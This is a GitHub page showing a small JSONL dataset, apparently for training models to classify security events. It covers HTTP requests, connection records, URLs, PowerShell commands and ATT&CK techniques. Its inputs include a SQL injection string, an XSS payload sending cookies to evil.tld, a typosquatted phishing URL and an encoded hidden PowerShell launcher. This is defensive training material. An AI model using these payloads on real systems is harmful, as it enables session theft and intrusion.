-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsample_cybersec.jsonl
More file actions
12 lines (12 loc) · 3.25 KB
/
sample_cybersec.jsonl
File metadata and controls
12 lines (12 loc) · 3.25 KB
1
2
3
4
5
6
7
8
9
10
11
12
{"instruction": "Classify the following HTTP request as benign or malicious, and identify the attack class if malicious.", "input": "GET /index.php?id=1' OR '1'='1 HTTP/1.1\nHost: example.com\nUser-Agent: sqlmap/1.7", "output": "malicious — SQL injection (boolean-based, sqlmap fingerprint in User-Agent)"}
{"instruction": "Classify the following HTTP request as benign or malicious, and identify the attack class if malicious.", "input": "GET /search?q=javascript HTTP/1.1\nHost: docs.example.com\nUser-Agent: Mozilla/5.0", "output": "benign"}
{"instruction": "Classify the following HTTP request as benign or malicious, and identify the attack class if malicious.", "input": "POST /comment HTTP/1.1\nHost: blog.example.com\nContent-Type: application/x-www-form-urlencoded\n\nbody=<script>fetch('https://evil.tld/c?'+document.cookie)</script>", "output": "malicious — stored XSS attempting to exfiltrate cookies"}
{"instruction": "Classify this network connection record as benign or assign the attack family it most resembles.", "input": "protocol=tcp | service=http | flag=S0 | src_bytes=0 | dst_bytes=0 | duration=0 | count=511", "output": "DoS — neptune (SYN flood pattern, S0 flag with high count)"}
{"instruction": "Classify this network connection record as benign or assign the attack family it most resembles.", "input": "protocol=tcp | service=http | flag=SF | src_bytes=215 | dst_bytes=45076 | duration=0 | count=8", "output": "benign"}
{"instruction": "Classify this network connection record as benign or assign the attack family it most resembles.", "input": "protocol=tcp | service=private | flag=REJ | src_bytes=0 | dst_bytes=0 | duration=0 | count=119", "output": "Probe — portsweep (high REJ count across services)"}
{"instruction": "Decide if this URL is a phishing attempt and explain the indicators.", "input": "https://secure-login.paypa1-account-verify.com/signin?token=abc", "output": "phishing — typosquatted domain (paypa1 vs paypal), suspicious subdomain prefix, urgency in path"}
{"instruction": "Decide if this URL is a phishing attempt and explain the indicators.", "input": "https://www.paypal.com/myaccount/summary", "output": "benign — apex domain matches the legitimate brand and path is on-product"}
{"instruction": "Given this PowerShell command, decide if it is suspicious and explain why.", "input": "powershell -nop -w hidden -enc JABjAGwAaQBlAG4AdAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQA...", "output": "suspicious — hidden window, NoProfile, and base64-encoded payload are classic LOLBin/empire indicators"}
{"instruction": "Given this PowerShell command, decide if it is suspicious and explain why.", "input": "Get-Service | Where-Object { $_.Status -eq 'Running' }", "output": "benign — read-only service enumeration, common admin task"}
{"instruction": "Identify the MITRE ATT&CK technique that best describes the observed activity.", "input": "Adversary dumped LSASS memory using procdump.exe to extract credentials.", "output": "T1003.001 — OS Credential Dumping: LSASS Memory"}
{"instruction": "Identify the MITRE ATT&CK technique that best describes the observed activity.", "input": "A new scheduled task was created via schtasks.exe that runs a script at user logon.", "output": "T1053.005 — Scheduled Task/Job: Scheduled Task (also Persistence via T1547 if at logon)"}